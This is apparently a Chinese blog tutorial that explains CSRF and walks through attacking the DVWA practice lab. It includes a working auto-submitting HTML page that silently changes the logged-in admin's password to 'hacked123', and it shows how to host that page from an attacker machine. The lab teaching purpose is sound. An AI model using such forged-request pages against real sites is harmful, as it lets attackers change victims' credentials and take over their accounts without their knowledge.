CSRF(跨站请求伪造)

🧨 什么是 CSRF?

CSRF(Cross-Site Request Forgery) 是一种攻击方式,诱导已登录的用户浏览器发送未授权请求,比如更改密码、转账等,而用户并未察觉。

攻击前提:

  1. 受害者已登录某网站,并保持登录状态(有 Cookie)。
  2. 攻击者诱导受害者访问一个恶意页面,该页面发出请求到受害者登录的站点。
  3. 服务端认为请求合法,因为带有受害者的 Cookie。

✅ DVWA 中的 CSRF 测试位置:

  1. 拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa
  2. 打开 DVWA Web 界面:http://localhost:8080,用户名:admin,密码:password
  3. 登录后,点击左侧菜单 "CSRF"。
  4. 默认功能是 修改用户密码,就是我们的测试点。

🔥 第一步:构造 CSRF 攻击页面(HTML 文件)

查看修改密码页面的前端代码:

你可以用如下代码,保存为 csrf_attack.html:

bash 复制代码
<!DOCTYPE html>
<html>
  <body>
    <h3>😈 正在发起 CSRF 攻击...</h3>
    <form action="http://localhost:8080/vulnerabilities/csrf/" method="GET">
      <input type="hidden" name="password_new" value="hacked123" />
      <input type="hidden" name="password_conf" value="hacked123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="点我也改密码" />
    </form>

    <script>
      document.forms[0].submit(); // 自动提交
    </script>
  </body>
</html>

🔄 第二步:启动一个 HTTP 服务器(攻击服务器)

假设你用攻击者机器,运行:

bash 复制代码
python3 -m http.server 8082

然后在浏览器打开:

bash 复制代码
http://<攻击者IP>:8082/csrf_attack.html

如果你已登录 DVWA,访问该页面就会修改你的密码。

输入网址后回车结果:

✅ 第三步:验证密码是否被改了

回到 DVWA,尝试用新密码登录:

  • 用户名:admin
  • 密码:hacked123

🧱 防御思路(了解):

DVWA 高安全等级下会引入 CSRF Token 防护机制,攻击者无法伪造。

相关推荐
余防4 小时前
CSRF跨站请求伪造
前端·安全·web安全·csrf
小苑同学1 天前
PaperReading:《Manipulating Multimodal Agents via Cross-Modal Prompt Injection》
人工智能·网络安全·语言模型·prompt·安全性测试
修炼果2 天前
为什么使用 Redis 存储Oauth的state 参数,可有效防止 CSRF 攻击
数据库·redis·csrf
emma羊羊2 天前
【CSRF】防御
前端·网络安全·csrf
emma羊羊2 天前
【CSRF】跨站请求伪造
前端·网络安全·csrf
Codingwiz_Joy13 天前
Day43 PHP(mysql不同注入类型、mysql不同注入点、mysql传输不同数据类型 )
网络安全·php·安全性测试
会有钱的-_-15 天前
基于webpack的场景解决
前端·vue.js·webpack·安全性测试
刀客12316 天前
测试之道:从新手到专家实战(四)
python·功能测试·程序人生·测试用例·集成测试·学习方法·安全性测试
介一安全24 天前
【Web安全】CRLF注入攻击深度解析:原理、场景与安全测试防御指南
安全·web安全·网络安全·代码审计·安全性测试
介一安全1 个月前
AI 暗战: 回声室攻击 —— 解锁大模型安全防御的隐秘战场
人工智能·安全·ai·安全性测试